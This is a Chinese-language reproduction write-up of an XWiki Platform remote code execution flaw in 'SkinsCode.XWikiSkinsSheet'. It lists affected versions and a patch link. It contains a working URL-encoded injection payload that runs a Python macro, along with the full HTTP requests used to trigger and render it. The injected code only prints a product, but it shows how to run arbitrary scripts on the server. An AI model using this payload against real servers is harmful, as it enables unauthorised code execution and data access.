0x00写在前面

本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!

0x01漏洞介绍

XWiki Platform是法国XWiki基金会的一套用于创建Web协作应用程序的Wiki平台。

XWiki Platform存在安全漏洞,该漏洞源于文档“SkinsCode.XWikiSkinsSheet”不当转义,从而导致远程代码执行。XWiki 平台是一个通用的 wiki 平台,为构建在其之上的应用程序提供运行时服务。 文档“SkinsCode.XWikiSkinsSheet”中的不当转义会导致从该文档的视图权限到编程权限的注入向量,或者换句话说,可以执行任意脚本宏,包括允许远程代码执行(包括无限制)的 Groovy 和 Python 宏对所有 wiki 内容的读写访问权限。 该攻击通过打开一个不存在的页面来进行,该页面的名称经过精心设计,包含危险的有效负载。 可以检查现有安装是否容易受到攻击。

0x02影响版本

7.0-rc-1 <= XWiki Platform < 14.4.8

14.5 <= XWiki Platform < 14.10.4

微信图片_20231001215952_副本.png

0x03漏洞复现

1.访问漏洞环境

微信图片_20231001215952_1_副本.png

2.对漏洞进行复现

POC (GET)

/bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view

解码

print(3724348 * 8473334)

微信图片_20231001215952_2_副本.png 
/asyncrenderer/async/macro/xwiki%3ASkinsCode.XWikiSkinsSheet/12/author/xwiki%3AXWiki.Vavitel/secureDocument/xwiki%3ASkinsCode.XWikiSkinsSheet/73216?clientId=73216&timeout=500&wiki=xwiki

解码

微信图片_20231001215952_3_副本.png

漏洞复现

GET请求, 注入命令

GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

操作1

微信图片_20231001215953_副本.png

解析执行命令

GET /asyncrenderer/async/macro/xwiki%3ASkinsCode.XWikiSkinsSheet/12/author/xwiki%3AXWiki.Vavitel/secureDocument/xwiki%3ASkinsCode.XWikiSkinsSheet/73216?clientId=73216&timeout=500&wiki=xwiki HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Cookie: JSESSIONID=A86B7F535B096996008E272EAD837DD7
Accept-Encoding: gzip

操作2

微信图片_20231001215953_1_副本.png

3.nuclei测试(漏洞存在)

微信图片_20231001215953_2_副本.png

0x04修复建议

目前厂商已发布升级补丁以修复漏洞,补丁获取链接:

https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h4vp-69r8-gvjg